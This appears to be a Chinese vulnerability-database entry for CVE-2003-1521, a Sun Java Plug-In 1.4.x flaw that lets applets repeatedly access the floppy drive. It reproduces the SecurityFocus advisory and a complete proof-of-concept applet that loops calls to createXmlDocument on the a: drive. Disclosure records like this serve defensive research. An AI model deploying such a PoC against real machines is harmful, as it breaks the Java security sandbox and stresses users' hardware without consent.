Sun Java非法Java程序软盘访问漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107525 漏洞类型 设计错误
发布时间 2003-10-21 更新时间 2003-12-31
CVE编号 CVE-2003-1521 CNNVD-ID CNNVD-200312-139
漏洞平台 Windows CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/23270
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-139
|漏洞详情
SunJavaPlug-In1.4到1.4.2_02版本存在漏洞。远程攻击者借助org.apache.crimson.tree.XmlDocument类别的createXmlDocument类函数重复地访问软盘驱动器,该漏洞违反了Java安全模型。
|漏洞EXP
source: http://www.securityfocus.com/bid/8867/info

A weakness has been reported in Java implementations that may constitute unauthorized access by Java applets to floppy devices. This weakness appears to present a flaw in the Java security model.

This issue was reported in Java Plug-in 1.4.x versions on Microsoft Windows operating systems, when run with Internet Explorer. Other environments and versions may also be affected.

import java.awt.Label;

public class MyFloppySucks extends java.applet.Applet {
private Label m_labVersionVendor;
public MyFloppySucks () //constructor
{
m_labVersionVendor = new Label ("Java Floppy Stress Testing Applet,
(2003) www.illegalaccess.org" +" / Java Version: " +
System.getProperty("java.version")+
" from "+System.getProperty("java.vendor"));
this.add(m_labVersionVendor);
}
public void paint(java.awt.Graphics g) {
while (1==1)
try {

org.apache.crimson.tree.XmlDocument.createXmlDocument("file:///a:/",false);
}
catch (Exception e) {
System.out.println("Java Floppy Stress Testing Applet,
(2003) www.illegalaccess.org");
}
}
}
|参考资料

来源:BID
名称:8867
链接:http://www.securityfocus.com/bid/8867
来源:BUGTRAQ
名称:20031021IE6&Java1.4.2_02applet:Hardwarestressonfloppydrive
链接:http://www.securityfocus.com/archive/1/341943